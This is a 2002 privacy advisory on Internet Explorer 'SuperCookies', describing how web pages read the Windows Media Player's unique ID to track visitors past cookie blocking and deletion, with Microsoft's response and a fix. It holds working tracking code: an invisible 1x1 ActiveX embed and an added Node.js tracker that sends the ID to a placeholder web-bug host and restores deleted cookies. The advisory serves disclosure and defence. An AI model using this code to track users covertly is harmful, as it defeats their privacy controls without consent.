http://www.computerbytesman.com/privacy/supercookie.htm

Internet Explorer SuperCookies bypass P3P and cookie controls 

Richard M. Smith ([EMAIL PROTECTED])
January 16, 2002 

Introduction
There is a significant privacy problem with Internet Explorer because of
a design flaw in the Windows Media Player (WMP). Using simple JavaScript
code on a Web page, a Web site can grab the unique ID number of the
Windows Media Player belonging to a Web site visitor. This ID number can
then be used just like a cookie by Web sites to track a user's travels
around the Web. 
However, this ID number becomes a SuperCookie because it can be used by
Web sites to bypass all of the new privacy and P3P protections that
Microsoft has added to Internet Explorer 6 (IE6). IE6 ships today with
all Windows XP systems. SuperCookies also work in all previous versions
of Internet Explorer on all older versions of Windows. 
Some of the other features of SuperCookies include: 
All Web sites get the same ID number, so they can easily exchange
information about a user, much like third-party cookies are used today by
ad networks and Internet marketing companies. 

Even if someone is using a cookie blocker add-in, SuperCookies will still
work. 

If a user has deleted cookies from his or her computer to stop tracking,
a Web site can restore an old cookie value from this ID number. Once the
cookie value has been restored, new tracking data can be combined with
tracking data that was previously collected by the Web site. 

Blocking SuperCookies requires changing an obscure, barely documented
option in WMP. 
Demo Page
I've set up a simple demo page that shows the issue: 

http://www.computerbytesman.com/privacy/supercookiedemo.htm 
Technical Details
When the Windows Media Player is installed on a computer, a unique ID
number in the form of a GUID is assigned to the player. This ID number is
stored in the Windows registry. The ActiveX interface to the Windows
Media Player allows any JavaScript program to retrieve the ID number
through the property "ClientID". 
The following example HTML and JavaScript code illustrates how easy it is
to retrieve the ID number: 
<!-- Embed the Windows Media Player ActiveX control at 1x1 pixels so that
     it is effectively invisible to the visitor. -->
<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP
WIDTH=1 HEIGHT=1>
</OBJECT>

<script>
// Internet Explorer exposes the OBJECT by its ID on the document;
// ClientID is the player's GUID as stored in the registry.
alert(document.WMP.ClientID);
</script>
Once the ID number is available to a JavaScript program, it can be sent
back to a Web site either by appending it to the URL of a Web bug or by
storing it in a regular Web browser cookie. 
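To make the tracking scenario concrete, here is an added example (not part
of the original advisory or of the demo page) of how a tracking site would
put the ID to use, covering both the Web-bug exchange just described and the
cookie restoration mentioned in the introduction. It runs under Node.js
rather than in Internet Explorer, so the player GUID and the document object
used by demo() are constructed stand-ins for document.WMP.ClientID, and
tracker.example is a placeholder host. The server side keeps nothing more
than a map from player ID to cookie value, which is all that is needed to
hand a visitor back the cookie he or she just deleted.

```javascript
// Added example, not code from the advisory: a tracking site's use of the
// WMP ClientID as a SuperCookie. The GUID and document used by demo() are
// constructed stand-ins for document.WMP.ClientID under Internet Explorer.

// Read the player ID defensively. Outside IE, or with the ActiveX control
// blocked, document.WMP is undefined and the access may throw.
function getPlayerId(doc) {
  try {
    const wmp = doc && doc.WMP;
    const id = wmp && wmp.ClientID;
    return typeof id === 'string' && id.length > 0 ? id : null;
  } catch (e) {
    return null;
  }
}

// Client side: append the ID to a Web-bug URL so it is sent to the site.
function webBugUrl(base, playerId) {
  const sep = base.indexOf('?') === -1 ? '?' : '&';
  return base + sep + 'wmpid=' + encodeURIComponent(playerId);
}

// Server side: pull the ID back out of the requested URL.
function playerIdFromUrl(url) {
  const m = /[?&]wmpid=([^&#]*)/.exec(url);
  return m ? decodeURIComponent(m[1]) : null;
}

// Tracker keyed on the player ID instead of on a cookie. Every site sees
// the same ID, so sites sharing this store can correlate visitors, and the
// ID survives cookie deletion, so an old cookie value can be re-issued.
class SuperCookieTracker {
  constructor() {
    this.cookieByPlayer = new Map();
    this.nextCookie = 1;
  }

  // Handle one hit on the Web bug. cookieValue is null when the browser
  // sent no cookie (deleted, or blocked by a cookie-blocker add-in).
  visit(requestUrl, cookieValue) {
    const pid = playerIdFromUrl(requestUrl);
    if (pid === null) {
      return { cookie: cookieValue, restored: false };
    }
    const known = this.cookieByPlayer.get(pid);
    if (known === undefined) {
      // First sighting of this player: mint a cookie and remember the link.
      const fresh = cookieValue !== null ? cookieValue : 'uid' + this.nextCookie++;
      this.cookieByPlayer.set(pid, fresh);
      return { cookie: fresh, restored: false };
    }
    // Player seen before: hand back the old cookie even if the browser
    // no longer has it, and carry on with the previous tracking record.
    return { cookie: known, restored: cookieValue !== known };
  }
}

// Walk through the advisory's scenario with a constructed GUID.
function demo() {
  const fakeDoc = { WMP: { ClientID: '{6E1A8D3F-0F3C-4B1D-9A6E-5C2B7D8E9F01}' } };
  const pid = getPlayerId(fakeDoc);
  const tracker = new SuperCookieTracker();
  const url = webBugUrl('http://tracker.example/bug.gif', pid);

  const first = tracker.visit(url, null);   // no cookie yet: mints uid1
  // ... the user now deletes all cookies and installs a cookie blocker ...
  const second = tracker.visit(url, null);  // uid1 is restored from the ID
  const noPlayer = getPlayerId({});         // non-IE browser: null

  return { pid, url, first, second, noPlayer };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run it with node. The second visit carries no cookie but the same player
ID, so the tracker returns the cookie minted on the first visit; that is
the cookie-restoration point made above, and it works whether the cookie
was deleted or blocked. getPlayerId() returns null where the control is
absent, which is what the same page sees in a browser without the WMP
ActiveX control or with scripting of it disabled.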
The actual WMP player ID number is stored in the Windows registry in
these keys: 
HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"

or

HKEY_USERS\<user>\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"
If one of these keys is manually changed using REGEDIT, the demo page
will show the new ID number. However, leaving the keys changed may break
the Digital Rights Management (DRM) features of WMP. 
In newer versions of WMP, there is an option on the "Tools | Options"
menu called "Allow Internet sites to uniquely identify your player". If
this option is manually turned off, SuperCookies will also be disabled,
because the player will generate a new ID number for each browser
session. 
SuperCookies also work in Netscape Navigator if the WMP plugin has been
installed. 
Recommendations for Microsoft
I originally notified Microsoft of this problem in March 2001. At that
time there was no method of turning off SuperCookies except to uninstall
WMP or disable JavaScript. Neither solution was very useful. In response
to my message to Microsoft, they updated WMP to provide per-session
player ID numbers when the WMP option "Allow Internet sites to uniquely
identify your player" is turned off. This update is described in this
Microsoft security bulletin: 
http://www.microsoft.com/technet/security/bulletin/MS01-029.asp 
However, I do not believe that this is a workable solution for the
majority of Windows users. Asking them to change an obscure WMP setting
to fix a privacy leak in Internet Explorer is not a good policy. Instead,
I believe that the ClientID property in the WMP ActiveX control should be
permanently disabled by having it return an ID number of zero for all
players. 
Acknowledgements
Thanks to the many folks on the BugTraq and NTBugTraq mailing lists for
helping sort out all of the technical details of this issue. Russ Cooper,
moderator of NTBugTraq, was particularly helpful. Andrew Schulman and David
Martin also provided very useful feedback on the initial versions of this
advisory. 
Links
Microsoft Security Bulletin on a Windows Media Player patch 
NTBugTraq: Windows Media Player ID update 
CNET: Privacy flaw continues to dig IE hole 
MSNBC: Privacy issue hits Windows Media 
The Register: Windows Media Player must be patched to fix IE 
Newsbytes: Windows Media Player 'Super Cookies' Could Help Track Users 
